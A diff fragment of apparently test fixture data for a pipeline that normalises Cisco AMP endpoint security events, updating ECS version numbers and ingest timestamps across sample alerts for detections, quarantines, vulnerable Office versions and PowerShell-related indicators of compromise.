"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":682000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\",\"sha1\":\"5faebef3bb880489195e80e6656ccf442ff7123b\",\"md5\":\"84b6f7be5370c1998886214790c6892b\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2414,7 +2414,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2434,7 +2434,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-12T17:32:35.701393451Z", + "ingested": "2021-09-13T18:06:29.783780334Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15152998206589,\"timestamp\":1610534253,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-13T10:37:33+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610534253,\"start_date\":\"2021-01-13T10:37:33+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WINWORD.EXE\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2013\",\"cve\":\"CVE-2014-0260\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260\"},{\"cve\":\"CVE-2014-1761\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761\"},{\"cve\":\"CVE-2014-6357\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357\"},{\"cve\":\"CVE-2015-0085\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085\"},{\"cve\":\"CVE-2015-0086\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086\"},{\"cve\":\"CVE-2015-1641\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641\"},{\"cve\":\"CVE-2015-1650\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650\"},{\"cve\":\"CVE-2015-1682\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682\"},{\"cve\":\"CVE-2015-2379\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379\"},{\"cve\":\"CVE-2015-2380\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380\"},{\"cve\":\"CVE-2015-2424\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424\"},{\"cve\":\"CVE-2016-0127\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127\"},{\"cve\":\"CVE-2016-7193\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193\"},{\"cve\":\"CVE-2017-0292\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292\"},{\"cve\":\"CVE-2017-11826\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826\"}]}}", "kind": "alert", "start": "2021-01-13T10:37:33.000Z", @@ -2580,7 +2580,7 @@ { "@timestamp": "2021-01-13T10:23:35.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2598,7 +2598,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:35.701395327Z", + "ingested": "2021-09-13T18:06:29.783782431Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508159571352093000,\"timestamp\":1610533415,\"timestamp_nanoseconds\":349000000,\"date\":\"2021-01-13T10:23:35+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6508159571352093000", "kind": "alert" @@ -2647,7 +2647,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2667,7 +2667,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701397204Z", + "ingested": "2021-09-13T18:06:29.783788750Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298360312529000,\"timestamp\":1610532793,\"timestamp_nanoseconds\":312509000,\"date\":\"2021-01-13T10:13:13+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610532793,\"start_date\":\"2021-01-13T10:13:13+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "kind": "alert", "start": "2021-01-13T10:13:13.000Z", @@ -2733,7 +2733,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2753,7 +2753,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701399064Z", + "ingested": "2021-09-13T18:06:29.783790904Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298355162029000,\"timestamp\":1610532788,\"timestamp_nanoseconds\":162019000,\"date\":\"2021-01-13T10:13:08+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610532788,\"start_date\":\"2021-01-13T10:13:08+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "kind": "alert", "start": "2021-01-13T10:13:08.000Z", @@ -2812,7 +2812,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2832,7 +2832,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701401029Z", + "ingested": "2021-09-13T18:06:29.783793103Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508153524038140000,\"timestamp\":1610532007,\"timestamp_nanoseconds\":606000000,\"date\":\"2021-01-13T10:00:07+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6508153524038139905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2890,7 +2890,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2910,7 +2910,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701402957Z", + "ingested": "2021-09-13T18:06:29.783795204Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521062325693667300,\"timestamp\":1610447087,\"timestamp_nanoseconds\":693632000,\"date\":\"2021-01-12T10:24:47+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610447087,\"start_date\":\"2021-01-12T10:24:47+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "kind": "alert", "start": "2021-01-12T10:24:47.000Z", @@ -2964,7 +2964,7 @@ { "@timestamp": "2021-01-12T10:15:22.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2982,7 +2982,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:35.701404886Z", + "ingested": "2021-09-13T18:06:29.783797267Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6532910514396201000,\"timestamp\":1610446522,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-12T10:15:22+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6532910514396201000", "kind": "alert" @@ -3037,7 +3037,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3069,7 +3069,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701406760Z", + "ingested": "2021-09-13T18:06:29.783799355Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:Malwaregen.21do.1201\",\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"OLD.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\OLD.exe\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\",\"sha1\":\"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c\",\"md5\":\"cfdd16225e67471f5ef54cab9b3a5558\"},\"parent\":{\"process_id\":2632,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\",\"sha1\":\"84123a3decdaa217e3588a1de59fe6cee1998004\",\"md5\":\"38ae1b3c38faef56fe4907922f0385ba\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -3126,7 +3126,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3146,7 +3146,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701408626Z", + "ingested": "2021-09-13T18:06:29.783801409Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -3210,7 +3210,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3242,7 +3242,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701410523Z", + "ingested": "2021-09-13T18:06:29.783803490Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.F2863A.211556.in02\",\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"twhy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Roaming\\\\twhy.exe\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\",\"sha1\":\"7d9518ea3f98d037745352b23861fab05d3777dc\",\"md5\":\"c624d61b8f076c3ef05f74eeb96c8954\"},\"parent\":{\"process_id\":4868,\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\",\"sha1\":\"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d\",\"md5\":\"92f44e405db16ac55d97e3bfe3b132fa\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -3299,7 +3299,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3319,7 +3319,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701412407Z", + "ingested": "2021-09-13T18:06:29.783805582Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -3377,7 +3377,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3397,7 +3397,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701414261Z", + "ingested": "2021-09-13T18:06:29.783807646Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132516139000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":516130000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "kind": "alert", "start": "2020-12-25T05:30:41.000Z", @@ -3463,7 +3463,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3483,7 +3483,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701416142Z", + "ingested": "2021-09-13T18:06:29.783809722Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132474871000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":474861000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched 